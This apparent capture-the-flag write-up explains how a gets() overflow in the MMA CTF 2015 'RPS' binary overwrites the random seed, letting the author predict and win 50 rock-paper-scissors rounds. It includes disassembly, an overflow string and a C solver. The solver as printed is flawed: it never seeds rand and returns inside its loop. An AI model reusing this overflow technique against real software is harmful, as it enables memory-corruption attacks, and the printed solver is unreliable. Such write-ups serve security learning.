Monday, September 7, 2015

MMA CTF 2015: RPS [Pwn] [Warmup]

For the RPS warmup challenge from MMA CTF 2015 we are asked to win 50 games of Rock Paper Scissors in order to be shown the key. We are provided with a binary to analyze.

The RNG is seeded by a 4-byte value from /dev/urandom. It is kept on the stack at $rbp-0x20:

=> 0x400825 <main+31>: lea    rax,[rbp-0x20]
   0x400829 <main+35>: mov    rcx,rdx
   0x40082c <main+38>: mov    edx,0x1
   0x400831 <main+43>: mov    esi,0x4
   0x400836 <main+48>: mov    rdi,rax
   0x400839 <main+51>: call   0x400650 <fread@plt>

The game prompts the player for a name and uses gets() to store the input at $rbp-0x50:

=> 0x400868 <main+98>: lea    rax,[rbp-0x50]
   0x40086c <main+102>: mov    rdi,rax
   0x40086f <main+105>: call   0x4006d0 <gets@plt>

After 48 bytes of input (0x50-0x20) by the player, gets() starts writing into the seed.

For example, sending a name string of "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB" will overwrite the seed with a value of 0x42424242.

Knowing all of this, a quick bit of C can be written to provide us with the winning sequence:

#include <stdio.h>
#include <stdlib.h>

int main(int argc, char *argv[]) {


int i;
for (i = 0; i < 50; i++) {
int throw = rand() % 3;
if (throw == 2) printf("R\n");
if (throw == 1) printf("S\n");
if (throw == 0) printf("P\n");

return 0;

We can then pipe the output of this program to the game to get the key:

lzlw@dongs:~/demos/mmactf2015/rps$ ./break | nc 1641
Let's janken
Game 1/50
Rock? Paper? Scissors? [RPS]Rock-Scissors
You win!!
Game 2/50
Rock? Paper? Scissors? [RPS]Rock-Scissors
You win!!
Game 3/50
Rock? Paper? Scissors? [RPS]Scissors-Paper
You win!!
Game 49/50
Rock? Paper? Scissors? [RPS]Paper-Rock
You win!!
Game 50/50
Rock? Paper? Scissors? [RPS]Scissors-Paper
You win!!